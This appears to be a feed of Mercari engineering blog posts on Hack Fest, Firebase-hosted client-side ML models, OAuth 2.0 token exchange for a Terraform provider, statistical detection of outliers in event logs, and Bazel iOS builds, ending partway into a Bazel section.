Hack Fest is a 3-day event, with the first 2.5 days dedicated solely for development. During this period, participants are expected to produce tangible results in any format of their choosing. Examples include uploading code to GitHub, creating slides or documents to share with relevant stakeholders, or publishing content externally on the Engineering Blog. It is important to keep a record of the output in some way to ensure it is properly documented and can be leveraged for future projects.

Showcase Day

On the final day of the event, there is an opportunity for participants to showcase their output during an event called ”Showcase Day”, which takes place in the afternoon. This is a chance for teams to present their efforts to the wider group and share their accomplishments. It is a great way to celebrate the hard work put in by all participants and recognize their achievements during the event

Two types of presentation format:

Demo slot (Available up to 20 teams)
- Participants will have 4 minutes to present
- There will be 2 minutes Q&A time
- This format should be used for projects with straightforward UI, projects with demos, and projects that require detailed explanation
Pitch slot (Available up to 10 teams)
- Participants will have 1 minute to present
- Presentation focusing on the purpose/summary/appeal points of the content we worked on.
- Additionally, participants are required to submit some form of output (code, documentation, etc.) for evaluation based on its contents
- For example, a presentation such as “I deleted unnecessary code for 100 lines!” would be suitable

Hack Fest Awards

Awards will be given on the Showcase day

The judges will examine the projects presented on the Showcase Day, and will select which ones will receive the Hack Fest awards. There are three basic award categories: Gold, Silver, and Bronze.

Extra Award

In addition to the basic award categories, extra awards will be awarded in some special cases. For the upcoming Hack Fest #7, two extra awards will be given : FinOps Award and LLM Award.

FinOps Award is an award that recognizes an individual or team that promotes a cost-conscious culture and takes ownership of spending.

In addition, the LLM Award aims to promote the use of LLM technology and further promote the understanding of LLM within the group.

Hack Fest KPIs

Until now, we have mainly relied on participant surveys to measure the effectiveness of our events. However, this time, we have reviewed our Key Performance Indicators (KPIs). It used to be difficult to accurately gauge the impact of the event because the number of responses to the survey were lower than what we were looking for.

To address this, we have added alternative metrics and are introducing our current KPIs, which are broadly classified into two types

KPIs that measure the excitement of the entire event

This KPI indicates the level of excitement generated by the event and how attractive it was to the attendees.

Number of entries to Hack Fest
- At Hack Fest, filling out the Idea Board is considered an entry to the event. In other words, the number of entries equals the number of people who filled out the Idea Board
- Participants can participate in the Hack Fest as an individual or as a team. For example, if a participant opts to participate as a team of 3, we will count it as 3 entries.
Number of participants on Showcase Day
- This refers to the total number of participants at the results presentation event ”Showcase Day” which is held on the final day of Hack Fest

KPIs that align with the expected outcomes

This index is used to understand whether the "expected outcomes of Hack Fest" mentioned earlier are being achieved

1 Impact on Products: Creation of new ideas that drive innovation in products.
- Numbers of ideas on the idea board
- (Long-term measurement) The numbers of ideas born at Hack Fest that are used in actual products/operations
2-1 Impact inside the organization : Increased motivation to work at Mercari
- (Survey-based measurement) Did participating in Hackfest increase your motivation to work at Mercari?
2-2 Impact on the inside of the organization : Providing opportunities to improve skills
- (Survey-based measurement) Did you learn new techniques that you don"t use in your daily work? Or did you have the opportunity to deepen a skill that you’re already somewhat familiar with?
- (Survey-based measurement) Did you have the opportunity to work consistently from the "what" (what to make) to the "how" (how to make it)
2-3 Impact on the inside of the organization : Increased expectations for engineering possibilities
- Number of Showcase Day participants who are not Engineers or Product Managers (PdMs)
- Number of participants at the After Party (where award announcements will be made) who are not Engineers or Product Managers (PdMs)
3.Impact outside the organization : Contributing to branding as a tech company
- Total number of unique users (UU) who viewed Hack Fest-related blog posts

We are still in the process of searching for suitable KPIs. Our plan is to measure the current KPIs and update them as needed, while striving to improve based on the results.

Summary

This article provides an overview of the current state of Hack Fest as of April 2023.

Hack Fest is a “Technology Festival” mainly for Engineers, Project Managers and Product Managers (PdM). However, excitement created by technology is not only felt by them but it also resounds to all Mercari employees.

Therefore, lately, my aim is to position Hack Fest as a festival that all employees can look forward to.
We worked with our in-house creative team to update the logo and key visuals of Hack Fest. We also added "improved expectations for engineering possibilities” to the expected effects of the event and focused on improving customer success. As part of this effort, we collaborated with the team to create a special VOC page and prepared FinOps Awards and LLM Awards. In addition to Mercari, Merpay members will also participate this time.

Hack Fest, which will be held for the 7th time, will be more exciting than ever.

(However, as the scale of the event grows and more people get involved, the excitement increases, but on the other hand, the complexity of the event also increases, making it difficult for participants to understand. The sense of balance has become more complicated.)

I"m very much looking forward to seeing all of the interesting results from Hack Fest.

I"m planning to write another article as an event report after the event, so please look forward to it as well!

If you want to know more about HACK WEEK, please refer to related past articles.

Model management for client side ML powered by Firebase

Mon, 17 Apr 2023 13:00:42 GMT

Hi everyone! I am Rakesh from the Mercari’s Seller Engagement team. Recently I had the opportunity to mentor an Intern at Mercari. His name is Priyansh and this article summarizes part of his work on using Firebase for client side machine learning models.

Introduction

The availability of huge data, advances in powerful processing and storage, and the increasing demand for automation and data-driven decision making has led to the widespread popularity of machine learning today.

Many companies want to use machine learning but it can be very expensive, the cost associated with developing, training and deploying can be significant, as well as the cost of using specialized hardware like GPUs, cloud computing resources, storage and networking.

Traditionally machine learning models are deployed on the server side but the popularity to enable client side machine learning is also increasing. There are many advantages to using AI on the edge.

No internet connection required.
Do not need to send data to the server.
Real time inference, with extremely low latency.
Little to no server cost.

Why we wanted to use ML on client side

We at mercari are always trying to increase the value in our marketplace by building many innovative features. Barcode listing is one such powerful feature which makes sellers list easily by scanning the barcode of certain categories of items.

Sometimes users, especially new users are not fully aware of all our features and barcode listing is such a feature. To address this and to improve the customer experience, we wanted to use Edge AI. So, we built a new feature called listing dispatcher, which uses an ML model on client side to predict if the category of item being listed by the seller supports barcode listing or not using the item’s first photo.

How to use ML on client devices?

We can use one of the popular open source mobile libraries called TensorFlow Lite (in short also called TFLite) for client side machine learning inferences. It has many key features like

Optimized for on-device machine learning.
Supports multiple platforms.
Support across many languages like Java, Swift, etc.
High performance.
Support many common machine learning tasks like image classification, object detection, etc.

We can simply embed the TensorFlow Lite model to an android or iOS app while packaging it to apk or ipa. This is one of the easiest ways to use ML on the client side but it has certain limitations.

ML models are usually huge and packaging it with the app will increase the app size and can lead to drop in installations on iOS app store or Android play store.
An additional overhead to optimize the ML model for compression, for which we may need to compromise with model accuracy.
It can also affect the development flow of the client side.

Embedding the tflite model on Android by adding it to app assets

Is there a better way?…

Firebase Machine Learning Custom Model

It is one of the services of Firebase which enables you to deploy your own custom ML model on edge devices. We don’t need to package the app with ML model, but instead the client will download the ML model after installation in background on demand from remote only once and reuse it for subsequent inferences.

There are many advantages to using this method

ML models are hosted on Firebase.
Helps in version control of ML models and ML model management.
Decoupling of client side development flow and ML development flow.
Ensuring that the app always uses the latest version of ML model.
Can configure conditions on when to download the latest model.
A/B test two versions of a model

Firebase console to use custom machine learning

Even though using Firebase dynamic model loading has many advantages, We need to be mindful of the following

Error handling – Fallback to default model or disable ML feature, if a new version of ML model has errors.
When should we download the model? For example download only when the user is connected to a wifi etc.

Conclusion

ML is very useful in a wide range of use cases like object detection, barcode scanning etc. There are various challenges to using ML on the client side but Firebase Custom Model has made it so easy with APIs to fetch ML models from remote, model management, faster experimentation and ability for developers to customize configurations.

Using the OAuth 2 token exchange standard for managing the identity platform resources

Fri, 14 Apr 2023 15:44:17 GMT

This article was written as "Series: The Present and Future of the RFS Project for Strengthening the Technical Infrastructure".
In today’s article, we will discuss how the Mercari ID platform team applied the OAuth 2.0 token exchange industry standard for its internal use.

Introduction

In the Mercari architecture, the business services are supported by various platform services. One such platform service that is critical for the overall security of the system is the identity platform (IDP). It provides authentication and authorization features to other services within the Mercari group, and is based on several industry standards. The platform’s responsibilities include:

Authorizing external clients access to the Mercari platform
Authorizing access between services within the Mercari platform
Authorizing access between various subsystems in the Mercari platform

The ID platform also constantly evolves to support new services and use cases that appear. In this article, we would like to describe one such evolution, where the OAuth 2.0 Token Exchange standard was applied to support several new features of the Mercari ID Platform.

The OAuth 2.0 token exchange standard

As mentioned in a previous article, the Mercari ID platform uses several industry standards, such as OAuth 2.0 (RFC 6749) and OpenID Connect (OpenID Connect Core 1.0). OAuth 2.0, on which OpenID Connect is also based, defines a protocol that allows clients (for example a web or mobile application, a backend server, …) to obtain a credential called an “access token”, and use it to access a protected resource (such as an HTTP service).

Several flows are available for obtaining the access token, but the general idea is that an authorization (called a “grant type” in OAuth 2.0) is obtained from the owner of the resource, which is then exchanged for an access token by calling a pre-defined endpoint (called the “token endpoint” in OAuth 2.0) of an authorization server. Clients may also obtain the access token on their own behalf.

The protocol is very flexible, and it supports various use cases, such as an end-user in a web application accessing a backend server, or a server accessing another server without user interaction. In addition, the protocol is designed in a way that allows new grant types to be defined.

However, the scope of the OAuth 2.0 standard ends when the resources have been accessed using the access token. It does not define how an entity that already holds a valid token can access a resource located elsewhere, over the boundary of a security domain for example. As explained in the previous article, the entity in this case could itself be a resource server that was accessed by a different client. A flow involving a user authorization could look like the following:

This type of access scenario can also happen with clients acting on their own behalf. More generally, any entity that holds a valid token and needs to access an external system needs to consider how to access that system.

The security domain B in the examples above might be completely unrelated to domain A, and have independent access requirements. Therefore, even if a server in the security domain A already has a valid security token (a more generic concept that includes access tokens), it might still not be able to use it to access a resource in the security domain B.

This type of scenario is not specific to architectures using OAuth 2.0. Security Token Services (STS) have traditionally been used in those cases, to issue a new token for security domain B from an existing valid token. For environments like Mercari where OAuth 2.0 is already used, there exists a standard (OAuth 2.0 token exchange, RFC 8693) that defines a way for OAuth 2.0 authorization servers to act as an STS, by extending the OAuth 2.0 standard with a new “grant type”.

In that specification, a client that holds a valid token (regardless of how the token was initially obtained) may call the token endpoint of an OAuth 2.0 authorization server to obtain a new valid token:

In the example above, “Domain A resource server” acts as an OAuth 2.0 client to exchange the original token (called the “subject token” here) ST1 for an access token AT2 using the token exchange grant type. In this case, the authorization server needs to be able to validate ST1, as well as issue tokens for the security domain B.

To be able to support the token exchange scenarios described above, the standard augments the OAuth 2.0 specification with some parameters for the token endpoint. Let’s take a look at some of those new parameters and values:

grant_type: this must be set to “urn:ietf:params:oauth:grant-type:token-exchange”
subject_token: this is the source token that needs to be exchanged.
subject_token_type: the type of the subject_token token. Several types of tokens are supported in the specification, such as OAuth 2.0 access tokens or ID tokens (from the OIDC standard).

In the token exchange scenarios, clients may act on their own, or they may act on behalf of another entity E. The standard makes the distinction between 2 common scenarios:
– Impersonation: in that case the client acts as if it was the other entity E. From the authorization server perspective, it is as if the token exchange request came from E. Similarly, from the point of view of a resource server where the resulting token is later used, the request came from E.
– Delegation: in that case, the client acts on behalf of the other entity E, but the 2 entities are clearly distinguished. This is achieved by sending an additional “actor_token” parameter in the token exchange request, that contains the token for the client that acts on behalf of E. The issued token is then associated with information about both entities.

These allow supporting a large number of token exchange scenarios and access requirements of the target security domain.

Applying the OAuth 2.0 token exchange standard

This token exchange standard is used in multiple features provided by the Mercari ID platform. One such feature is a custom Terraform provider developed by the IDP team, but before we describe this use case, some background information about the IDP team’s processes need to be explained.

The ID platform provides several services related to authentication and authorization, used for both internal communication between microservices, and communication with clients outside of the Mercari security domain. To support this, it is necessary to register in advance some entities, such as:

access permissions for services inside the Mercari platform,
access permissions between subsystems in the Mercari platform,
and several others.

The registration of those permissions was handled manually by the IDP team in the past. This allowed having a careful review process, but it also made the registration flow time-consuming. We looked for a way to keep a strict review process, while making it easier and faster for all teams to register permissions.

We eventually settled on the idea of using Terraform for this purpose. Hashicorp Terraform is a tool that allows managing external resources as code. Resources are often infrastructure entities (such as servers, cloud storage, network components, …), but it is also possible to develop custom plugins (called “providers”) for managing other resources, such as the pre-registered permissions described above. This solution has 2 main benefits:

a custom Terraform provider allows declaring, as code, the resources that represent the data to be registered (access permissions for example), so it’s possible for each team to manage those entities themselves,
we could take advantage of our existing code review flow to keep a strict review process.

This seemed like a suitable solution, but one problem remained: how could we authorize the custom Terraform provider to access the ID platform API to manage those registrations? It was necessary to have a way to obtain a valid token to access the ID platform resources from Terraform.

Since the Continuous Integration (CI) platform resides outside of the Mercari microservices platform, the token exchange mechanism explained above seemed like a perfect fit.

As explained in the previous section, the token exchange protocol requires the client to present a token type that can be validated by the authorization server. Since the CI platform is based on Google Cloud services, the custom Terraform provider can leverage the Google Cloud IAM service to obtain a short-lived service account Google ID token, which is used as the subject token in the token exchange process. After obtaining the access token, the custom Terraform provider can access the ID Platform and register the necessary permission resources.

The Google ID token itself could not have been used directly as a token to access the resource server. Indeed, ID tokens are security tokens but are not access tokens, and they only provide information about the authentication of an entity. The issued access token, on the other hand, is designed for accessing resource servers, and as such has mechanisms to control where and how it can be used via the audiences and scopes associated with it. In addition, it could be considered that, in the future, the resource server handling permissions might be called by a client other than the custom Terraform provider. Using a standard access token to authorize access to the permission resources makes it simple to expand to other use cases in the future.

Another benefit of using the token exchange standard is that the custom Terraform provider can leverage the token exchange impersonation mechanism described above, to act on behalf of each service. In the Mercari CI platform, a service account is assigned to each service, which is used when executing Terraform commands for the resources of that service only. In addition to the security benefits of this approach, it also allows the ID platform to verify, for each request to one of its resource endpoints, that the requesting service is the owner of the permission that needs to be modified. In that case, the service account email of a particular service is used as the subject of both the Google ID token and the access token issued during the token exchange flow. From the point of view of the authorization service and of the ID platform, it is as if all actions were performed by that specific service account.

Finally, not every service account is allowed to obtain an access token using a Google ID token. The authorization server ensures that access tokens are issued only to some predefined service accounts associated with the Terraform provider OAuth client, and the access token is restricted to the specific audience and scopes allowed for that OAuth client. The resource server then rejects any request that does not have the required audience and scopes. This ensures that the Terraform provider cannot be used in an unexpected way, and that only authorized clients are allowed to manage the permission resources.

Conclusion

We have seen how the ID Platform team could leverage an industry standard to improve a critical internal process. This was made possible thanks to the flexibility of the OAuth 2.0 framework and its token exchange extension. The standard allowed developing a robust solution that significantly improved both the security and the efficiency of our internal permission registration process. This article only touches the surface of this topic. In a future article in this series, my colleague will discuss another application of this industry standard.

If you found this topic interesting, and would like to work with us on our authentication and authorization platform, please take a look at our current open position !

Follow the White Rabbit: Finding The Women With The Red Dress In A Torrent of Event Logs

Wed, 15 Mar 2023 14:00:50 GMT

This is a follow up post on Suspecting the Unsuspected. Extracting and Analyzing Log Anomalies. While the previous post demonstrated a nice way to assign an information value to any action based on its probability to be observed, it did had a few blind spots. This blog post will build over what was explained previously, and will present a way to assign an information value for the absence of actions. If you have time, it’s a good read too and will help to understand what is being used here.

TL;DR

Identifying outliers in a web application where all options are meant to be used can be challenging, but it is possible.

The hypothesis is that individuals in a defined population should be using actions in a similar proportion. Using the probability mass function equation of the binomial distribution, we can evaluate the likelihood we are to observe someone using each action, and give a likelihood score for the sum of all their actions, or inactions. The less likely, the greater the chances that we are observing an outlier. Malicious or not needs to be determined, but being able to single these individuals out can help.

The use cases for this method are limited to environments where we can see a large quantity of predictable and discrete actions.

The source code is available on Github. See the TRYME.md file for instruction on how to execute it.

1. Introduction: "Do you always look at [the Matrix] encoded?" — Neo, The Matrix, 1999

Looking at streams of logs is overwhelming. Maybe if we stared for a while we would start to see normal patterns and identify outliers.

In my last blog post, I demonstrated a method to translate probabilities of observing a given event into an information value in bits. By calculating the sum of the bits of information generated by each user, we can make the ones with the less likely behaviors stand out.

However, that method has a significant weakness: we can only identify outliers when they are doing something.

How about agents who are not doing something we would expect a normal user to do? Bots and malicious agents often fall into this category. Because these agents likely have a specific objective and are likely to limit their actions to the minimum necessary to reach their goal, they might skip some normal actions, or use them in different proportions. This detail is significant. The previous method couldn’t take it into account.

When a population is expected to have a normal behavior, it is possible to identify the agents who are not. This blog post will demonstrate one way to do so.

Get ready to see how deep the rabbit hole goes. Sadly, no red pill will make this clearer, but some math will.

1.1. What does it mean to be normal in the first place?

If we take a given population and compare their height, weight, age, number of eyes and fingers, we can expect that values will fall within certain ranges. Anything outside of these ranges would be considered less likely the further they are from the average.

Looking at numerical values makes it easy to calculate the average and how far one can be away from it. If one’s height 30cm, weight 5kg, is 102 years old, has 3 eyes and 16 fingers, that individual should fall outside of our expectations for a normal Earthling, but could be normal for the alien population in a movie.

Identifying what type of population we are dealing with is key to defining if an individual is expected to fit in it or not.
But what if we are dealing with action events? These typically consist of discrete actions. Walking, Eating, Flying, Sleeping, Talking,
Working, etc. By themselves we can’t just average these values, but we can calculate their frequency, or the probability of being observed in a given population.

To achieve this, I will use a few mathematical tools: Probability distribution, Binomial Distribution, Information Theory, Gaussian Distribution, Standard Deviation and the Z Score. All were covered in the previous article, with the exception of one: Binomial Distribution. This was the missing part that allows us to analyze the absence of events.

The next section will explain how it can be used. For the other concepts, please refer to the previous post.

1.2. How can we use the binomial distribution to calculate the likelihood of observing a specific behavior?

Here is the idea through an example.

Hypothesis: When authenticating to a system, an individual is expected to login successfully 66% of the time, doing a typo one in three times.

Question: Knowing this probability, what is the likelihood of observing "x" successful logins for "n" attempts?

Answer: Using the Probability Mass Function of the Binomial distribution, we can evaluate the probability of observing each outcome. Here is what it will look like up to 10 attempts.

Explanations of the table:

0 success in 0 attempt: 100% of the time, when someone isn’t trying to login, we will not see a successful login. If a successful login is observed without an attempt, we have a problem.
0 or 1 success in 1 attempt: Someone missing an attempt is still normal 34% of the time, being successful on the first try is normal 66% of the time.
0 success in 4 attempts: This should happen 1.34% of the time.
10 success in 10 attempts: This case is also unlikely with a probability of 1.57%. We should expect some typos. I know, people use password managers, but if we are looking at IP addresses logging in with different usernames without failures, this streak of success can mean something else.

Knowing the likelihood of observing each possible outcome, we can assign an information value in bits by calculating the -log2 of the resulting probability of the binomial distribution.

Here is the same table, but with each value converted in bits

And then we can repeat for each possible action offered by the system.

What is the percentage of time an individual will use the search function?
What is the probability that an individual will change their physical address?
What is the probability that an individual will change their phone number?
What is the probability that someone will comment on an item?
etc.

We can then sum up the bits of information produced by each individual and calculate how far their behavior is against the average population using the Z Score equation.

where:

x is the value of a given individual,
μ is the mean of the population,
σ is the standard deviation of the population.

2. Putting Everything Together, Backward

Explaining the process from the end makes it easier to understand why each step is necessary.

Step 5. We can separate abnormal people from the normal ones by calculating the Z score, giving how many standard deviations they are away from the average. For this, we need to know the average (μ) and the standard deviation (σ) of the population.
Step 4. To calculate the average and standard deviation, we need to calculate the number of bits of information for each action distribution for each individual in the population.
Step 3. To calculate the sum of bits of information generated by each individual, we need to apply the binomial distribution function for each possible action that can be taken by the population.
Step 2. This implies that we have kept a count of the number of times each individual performed each action.
Step 1. To compare against the general population, we need to keep a count of how many times each action has been observed overall, and calculate its probability against the total amount of actions observed.

About Identifying the Population

This is probably the most important part: We can only compare actions from a population that is expected to behave in the same ways.

Good examples could be:

Authenticated users of a web application will mostly use the same functions with a similar proportion: Individuals might have different profiles (buyers, sellers), but overall the actions should look alike.
The members of the customer support center who are going to be responding to similar requests: They are likely going to use a defined application and answer similar requests using a defined set of steps.

A population with relatively unpredictable behaviors will not produce good results:

All the Google Drive activities: employees are more likely to generate bursts of inconsistent activities. Looking at documents, search, add or download files patterns is unlikely to be the same for every employee or event for a given employee over time.
System activity logs for all employee’s laptops.
Sysadmins debugging servers: Debugging is exceptional by nature

3. Demonstration

For the demonstration, I will be using event logs from one of our systems. The details of this system aren’t important for the demonstration to work. However, it does meet the population isolation requirements mentioned in the previous section:

The population is expected to have a similar behavior. More than 99.9% should be legitimate users. Anyone who is 3σ (Z score of 3 or more) over the mean is considered an outlier.
The individuals can use around 60 distinct actions. Each of them is meant to be used and are considered legitimate if used normally.
The population will use the application for a range of time, depending on the individuals.

To visualize the results of the algorithm on the logs of the system, I substituted each action by a distinct character through a hashing function.

Login -> ア
Chat -> イ
Browse -> ウ
etc.

The output look like this:

Each individual is assigned to a given column. Multiple individuals may share the same column if there are more individuals than columns.
Their first action will always start from the top and go down with each new action.
Having evaluated the Z Score of each, we can filter out likely inoffensive individuals under a certain threshold.
Individuals with a behavior profile under 3σ are colored in green, any outliers (over 3σ) are in red.

While this visualization is obviously meant to be pretty, the underlying code can actually be used as part of a monitoring system to highlight potential deviating agents and take action if needed.

Source code

The source code generating this output is available on Github. See the TRYME.md file for instruction on how to execute it. Pull requests are welcome.

4. Conclusion

Standing out as an outlier doesn’t mean that the behavior is malicious. It simply means that it isn’t matching the expected distribution of actions for a given population.

However, being able to identify these outliers can help to spot potentially malicious agents in a really large population of individuals can be quite useful.

What could be done next…

The current code isn’t labeling behavior patterns, but it would be relatively easy to do by identifying actions (not) performed with a small expected probability, use these actions to create a label, and then cluster individuals based on these actions.

… but I will leave this for another time.

6. More Reading

Definition of the Probability Mass Function on Wikipedia.
3Blue1Brown on Youtube: Binomial distributions | Probabilities of probabilities, part 1
3Blue1Brown on Youtube: But what is the Central Limit Theorem? explains the normal distribution, mean, standard deviation and Z Score.
Python3 Scipy.stats.binom library
Go https://pkg.go.dev/gonum.org/v1/gonum/stat/distuv#Binomial
MIT News Explained: Sigma – How do you know when a new finding is significant? The sigma value can tell you – but watch out for dead fish

Fast and reliable iOS builds with Bazel at Mercari

Wed, 01 Mar 2023 11:00:46 GMT

This article is a translation of the Japanese article published on December 19th, 2022.

My name is Ryo Aoyama. I have been working as the iOS lead architect for Mercari.

In this article, I will describe, along with Thi Doãn who works on our build systems, how we introduced Bazel for our software builds during the rewrite for our iOS app to improve our builds.

Background

Within the Mercari app, we have developed countless features and functionalities within the app to provide a better listing and buying experience for our customers over many years. This has been the case even after the complete rewrite of our app which was released in September 2022: more than 100 pull requests are being merged every week, and the source code keeps growing.

As of this writing, the size of our source code looks like the following table. Although we were able to reduce the code size significantly, you can see that we still have a relatively large code base.

External source code size within Mercari app (measured excerpt via cloc)

Language	Files	Comment	Code
Swift	17259	317042	2167377
C++	717	42862	258290
C/C++ Header	2253	156329	239706
C	595	41432	212548
Objective-C	647	18797	143736

The build time has obviously been increasing along with the source code size. The source code size was a big factor in slowing down the entire development process, as it meant that each successive build was taking longer to build.

There was also the problem of build reliability. I’m sure you have also faced situations where certain problems were only seen on CI but not on local builds, or perhaps the build results did not quite match with other developers’ results.

Building software is one of the most important aspects in engineering. A typical developer builds software anywhere from tens to hundreds of times a day. As the number of developers increases in a team, so does the cost (and importance) of the building process. It was very important for our growing team of developers to adopt an advanced build system.

While Xcode would have sufficed in most cases, it was presenting us with the following problems:

There was not much we could do to speed up the build process
There was not much that we could do force idempotent builds
The build time was governed directly by the performance of the machine used
There was not much support for reusing modular components, which in our case were divided into 500~1000 separate parts
Modular components introduced much overhead when dealing with dynamic linking, and it was also hard to use static linking

To tackle these problems and create a fast and reliable build system, we have decided to adopt Bazel.

About Bazel

Bazel is an open source build tool developed by Google. It is most commonly used for applications based on Go or Java (among others), but it can also be used to build mobile applications for iOS and Android. The following are some of the merits of using Bazel over other tools such as Xcode:

Multi-language support: Bazel is built with the assumption that it is to be used on a monorepo that is implemented using multiple programming languages, and thus does not limit itself to a particular language features
Extensibility: Bazel can be configured and extended to work with languages that are not officially supported by the tool itself.
Reproducibility: Artifacts do not contain information about the build environment, avoiding the possibility of a build on CI being different from a build on a local machine
Configuration language: Bazel uses Starlark, a scripting language similar to Python. It is more than a DSL and can use variables and macros to implement advanced techniques for better reusability.
Advanced Caching: Extraneous builds can be completely skipped by creating a dependency graph from the build configurations. Remote caching and distributed building can be utilized to share artifacts between multiple machines
Task Automation: Bazel can include more than just building into its process; for example, dynamic code generation.

The Build Cache

Caching build artifacts and test results is one of the most effective ways to increase productivity. It is common to use tools like Carthage to build and cache external dependencies, which are not updated as frequently, and improve subsequent build times.

It is also possible to share these pre-built dependencies among developers by storing them in a shared cache storage.

Most of the build time, however, is taken up by the compilation of our own source code. It is hard to take advantage of these tools to pre-build and cache our own code, as they are constantly being modified.

In order to achieve significant performance improvements, we would need advanced features such as analyzing the dependency graph between build targets, deciding if which targets need to be rebuilt, checking if they can be run in parallel against each other, compute the critical path for a given build, etc. Bazel implements these features that are required in incremental builds.

Bazel is often described as being a fast building tool, but at least for the specific case of iOS application development, this may not necessarily be true. Bazel’s rules_apple and rules_swift actually work almost identical to what Xcode does in terms of compilation.

In fact, Xcode may be as fast, or even faster in some cases, than Bazel when compared against local builds on your machine, as Xcode is a very well written tool for incremental builds. There is some overhead of Bazel using static linking too.

The differentiating factor is in Bazel’s flexibility and abundance of choices to improve performance, as compared to the relatively limited choices available to Xcode. For example, because Bazel is created on the assumption that components will be modularized into small pieces, the merits of improvements and optimizations provided by caching are greater – as long as the modularization is done correctly.

One extra advantage of Bazel is the fact that it can utilize remote caches. A remote cache provides the ability to host build artifacts and test results on a shared storage server and share them among developers and CI environments. For example, if the CI performed the build beforehand and this result is shared through a remote cache, all developers sharing the cache will be able to avoid rebuilding the same components. If a developer makes changes in their local environment, Bazel will analyze the targets that are affected and only build the minimum number of targets that are required. This in turn means that most of the time you will never have to perform a clean build from scratch on your local environment.

This works similarly for tests: Bazel caches test results for each module and shows the cached results, only to execute them again when needed. Xcode would sometimes take over 1 hour to execute tests when there are many unit tests, so this brought significant improvement in lead time.

The image below shows a sample build log from our CI environment. You can see that only 2 out of 217 tests total were actually executed for this run. All other test results were not affected by the pull request that triggered this run, and thus they were fetched from the remote cache. Those tests marked as (cached) were not executed. As can be seen in this sample, test execution time was drastically reduced as we did not have to wait for the tests whose results we already knew.

The remote cache unfortunately does not come for free, and we need to manage our own remote cache backend. You can choose an arbitrary server that you will be setting up and maintaining, or you can use an instance of Google Cloud Storage (GCS), which is already compatible with Bazel’s remote cache. It was natural for us in Mercari, who extensively uses Google Cloud Platform, to initially select GCS as the remote cache. However, although GCS performed well, it did not support garbage collection features required in Bazel’s Remote Builds without the Bytes feature.

Later on, we migrated the remote cache backend to BuildBuddy, which supported the Remote Builds without the Bytes feature.

Either way, maintenance costs, as far as the number of hands required to maintain it, was nearly non-existent.

Distributed Builds and Tests

A Bazel feature similar to remote cache is the Remote Build Execution (RBE). RBE provides the ability to execute builds and tests on separate machines in a distributed manner. We can share and reuse the final results from executions on different machines, as RBE’s outputs are idempotent as with the remote cache.

We can significantly reduce the time it takes to build and test our software using distributed builds. For example, it may be possible to get better performance by executing CI on a separate machine when the main CI host does not provide enough horsepower.

We use RBE via BuildBuddy to build and test on a few hundred machines in Apple silicon M1 build farms. In our build configuration, all builds and tests can be executed on these farms by simply using the following command:

bazel test --config=RBE //…

The execution speed of our builds are only limited by the number of available CPU cores, because of our aggressive modularization that we performed when rewriting our application.

One problem that we faced when starting to use RBE was that while our CI servers were provisioned using Intel based Macs, the build farm consisted solely of Apple silicon Macs. Further complicating the matter, the developers themselves were working on a mix of Intel and M1 Macs because this was around the time when Mercari started providing M1 Macs to its employees. This required us to monitor for possible decrease in cache hit rates while supporting development. For details, please refer to the following blog article.

Bazel Remote Execution for iOS Builds with Apple Silicon

BuildBuddy makes it easy to analyze build execution with the visualization dashboard for build events. We also stream local building events to BuildBuddy’s dashboard, allowing everybody to share this log. Since Mercari’s development team works in a hybrid remote/onsite environment, this made it possible to properly share the status with all developers.

We only upload the module artifacts to BuildBuddy when changes are merged to the main branch of our repository, in order to achieve a balance between stability of the cache, costs incurred for the CI, and the cache hit rate. Each developer only needs to build artifacts that are affected by the local changes.

We have yet to determine if we should allow using RBE for local builds as well; For the time being we have only enabled RBE on builds running on our CI servers, and developers can only view the build events in the local development.

The following diagram shows the workflow when building iOS applications.

As a reference, I have included a sample benchmark executing builds on my machine, along with my execution environment.

Macbook Pro, Apple M1 Pro, 32GB RAM
Debug Build
3 runs
Local caches have been invalidated prior to each run
“Full Build”: Executed builds with no cache support.
“Remote Cache”: Builds with remote caching enabled.
“RBE”: Builds with remote cache and RBE enabled.

(ref.) Debug Build speed for the Mercari app

Build method	1st time	2nd time	3rd time
Full build	256.092 s	241.716 s	247.491 s
Remote cache	75.130 s	74.969 s	76.271 s
RBE	36.814 s	36.955 s	46.060 s

So far we have discussed the merits of using Bazel for our builds, but there were potential issues that we faced. In the following sections we will discuss what these were, and show you how we overcame them.

Integration with Xcode

Integration of Bazel and Xcode was the biggest concern that we had prior to introducing Bazel. Xcode is notoriously hard to integrate with an external build system, as it is a peculiar IDE that tightly integrates with the build system on its own. It was particularly difficult to get search indexing and LLDB debugging to properly work with it.

When we say “integration” we mean to reproduce Xcode’s features using Bazel’s outputs. For these the following must be satisfied:

Create Xcode projects using the Bazel build configuration files
Execute Bazel instead of Xcode when building
Place build artifacts into specific locations such that Xcode can use them for indexing

Only when the above are satisfied, can a developer use Bazel instead of Xcode. Some of other tools that integrate with Bazel are listed below

One major difference between Xcode and Bazel is that while Xcode always uses absolute paths, Bazel tries to use relative paths as much as possible. The main reason for this is that Bazel needs to be able to reproduce the same results when it has been run on a different machine or directory.

However, LLDB can only attach to an application when it is holding the information as absolute paths. In order to make this work we would need to use a custom lldbinit file to map relative paths to absolute paths when attaching. The same can be said for indexing.

In the early stages of the project we tried a few combinations of the previously mentioned tools and custom scripts, and decided to use a hybrid solution using Tulsi and index-import. A post-build step using index-import to remap the indexing was necessary, because while Tulsi already came with absolute remapping, it didn’t handle the indexing. We have observed that Tulsi seems to work with Google’s internal projects, however it seems to falter when used with other external projects, especially those that use multiple programming languages. Luckily we were rewriting our application from scratch, and our first party source code was all written in Swift, which meant that we didn’t have to do much to make Tulsi work for us. We did, however, fork Tulsi and made some changes to make it easier for us to use.

Xcode has a setting called IDEIndexShowLog enable indexing logging for analysis, which can be enable by executing the following command

defaults write com.apple.dt.Xcode IDEIndexShowLog -bool YES

This allowed us to check for errors when Tulsi, rules_apple, and rules_swift were updated. If there were no errors it meant that our indexing was working correctly.

This proved effective, but it was time consuming and prone to errors. We had been working on improving this integration.Since the beginning of 2022, developers from BuildBuddy has been actively developing a new Xcode integration tool called rules_xcodeproj, with contributions from other companies including Mercari. It has everything you need to integrate Bazel with Xcode without any custom solutions or hacks; Any iOS project using Bazel can use it.

After rules_xcodeproj stabilized, we have since migrated from Tulsi and we can say that our development environment is now very comfortable.

A common problem that other projects seem to face when migrating from Xcode to Bazel is that they need to support both tools. Some projects need to support Xcode even after the “migration”.

We were lucky in this regard as we were able to incorporate Bazel from the beginning because we were rewriting our application from scratch. Supporting Xcode while using Bazel as the main build system can hinder development for those developers who chose to work with Xcode. It’s also a relatively heavy burden for us to support both tools. For these reasons, we decided to support Bazel alone.

Runtime Performance

One of the downsides of increasing the level of modularization is that it slows the application startup.

